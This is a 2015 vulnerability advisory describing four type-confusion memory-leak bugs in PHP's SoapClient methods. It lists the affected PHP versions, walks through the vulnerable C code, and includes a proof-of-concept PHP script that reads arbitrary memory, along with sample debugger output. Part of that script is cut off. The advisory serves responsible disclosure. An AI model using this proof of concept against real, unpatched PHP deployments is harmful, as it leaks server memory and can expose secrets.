# Type Confusion Infoleak Vulnerabilities in SoapClient Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1 - Release Date: 2015.3.20 > Four type confusion vulnerabilities were discovered in SoapClient object's some methods that can be abused for leaking arbitrary memory blocks. Affected Versions ------------ Affected is PHP 5.6 < 5.6.7 Affected is PHP 5.5 < 5.5.23 Affected is PHP 5.4 < 5.4.39 Affected is PHP 5.3 <= 5.3.29 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` PHP_METHOD(SoapClient, __getLastRequest) { zval **tmp; if (zend_parse_parameters_none() == FAILURE) { return; } if (zend_hash_find(Z_OBJPROP_P(this_ptr), "__last_request", sizeof("__last_request"), (void **)&tmp) == SUCCESS) { RETURN_STRINGL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp), 1); } RETURN_NULL(); } ``` The Z_STRVAL_P macro lead to looking up an arbitrary valid memory address, and return a string via a doubles-type or integer-type zval that start from this memory address. If the memory address is an invalid memory position, it should result in a crash. The Z_STRLEN_PP macro for accessing str.len member from the zvalue_value union, and return string's length. For integers the Z_STRLEN_PP macro is generally return 1, so a integer-type ZVAL can collide a string of length 1. The size of a double is 8 bytes, so on 32bit system a double-type ZVAL can collide a string of any length The very similar bugs exists in SoapClient object's __getLastResponse(), __getLastRequestHeaders(), and __getLastResponseHeaders() methods. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.14. ``` "", 'uri' => "")); $str = ''; for ($i = 0x100351e3d; $i < 0x100351e3d + 25; $i++) { $z->__last_request = $i; $str .= $z->__getLastRequest(); } var_dump($str); ?> ``` Test the PoC on the command line, then output some memory blocks: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run test.php Process 6366 launched: '/usr/bin/php' (x86_64) string(25) "UH??AWAVSPI??I??H???? H" Process 6366 exited with status = 0 (0x00000000) ```